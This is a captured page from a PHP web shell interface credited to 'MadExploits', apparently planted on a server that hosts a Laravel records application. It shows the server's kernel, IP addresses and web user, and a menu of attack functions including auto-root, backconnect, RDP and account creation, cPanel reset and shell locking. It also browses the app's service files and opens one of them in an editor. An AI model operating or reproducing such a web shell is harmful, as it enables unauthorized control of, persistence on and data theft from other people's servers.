Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sifaris /
app /
Services /
[ HOME SHELL ]
Name
Size
Permission
Action
AddressService.php
3.88
KB
-rw-rw-r--
AdminUserService.php
1.94
KB
-rw-rw-r--
AppUserService.php
1.7
KB
-rw-rw-r--
CategoryService.php
6.28
KB
-rw-rw-r--
FiscalService.php
1.13
KB
-rw-rw-r--
OfficeService.php
888
B
-rw-rw-r--
PriorityService.php
2.01
KB
-rw-rw-r--
SifarisFormService.php
994
B
-rw-rw-r--
SifarisRecordService.php
6.4
KB
-rw-rw-r--
StatusService.php
1.93
KB
-rw-rw-r--
YojanaBaseInterface.php
1.59
KB
-rw-rw-r--
YojanaBaseService.php
12.57
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : YojanaBaseInterface.php
<?php namespace App\Services; use Illuminate\Database\Eloquent\Model; interface YojanaBaseInterface { public function findById($where = []); public function find($where = [], $with = []); public function findAll($where = [], $with = []); public function save($data); public function update($data = [], $where = []); public function delete($where = []); public function softDelete($where = [], $data = []); public function upload($data, array $valid_extensions, $max_size = null); public function unlinkFile($file_path); public function findById_WM($where = [], $model = null); public function find_WM($where = [], $with = [], $model = null); public function findAll_WM($where = [], $with = [], $model = null); public function findAllWhereIn_WM(string $field, $where = [], $with = [], $model = null); public function save_WM($data, $model, $unique_by = null, $unique_by_array = []); public function update_WM($data = [], $where = [], $model = null, $unique_by = null); public function delete_WM($where = [], $model = null, $with = [], $deleted_by = null); public function list_WM($model, $where = [], $with = [], $request = [], $arrayFilter = []); public function softDelete_WM($model, $where = [], $data = []); public function isDirty($model, $request, $column = [], $where = []); public function getArrayOfSpecificField($model, $column = 'id', $where = []); public function enableQueryLog(); public function uploadFile($file_content, $file_name, $id, $model); public function getIdByCode($code, Model $model); }
Close